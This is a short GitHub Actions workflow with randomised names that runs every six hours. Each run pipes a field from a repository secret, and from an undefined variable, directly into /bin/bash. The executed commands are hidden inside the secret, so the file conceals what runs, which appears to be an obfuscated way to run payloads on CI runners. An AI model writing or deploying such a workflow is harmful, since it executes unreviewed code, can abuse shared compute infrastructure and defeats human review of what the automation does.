name: laimouli2197
on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: laimouli2197
        env:
          xtjey63397: ${{ secrets.xtjey63397 }}
        run: |
          echo $xtjey63397 | jq -r .frcah262 | /bin/bash
          echo $pnrg952 | jq -r .q3 | /bin/bash

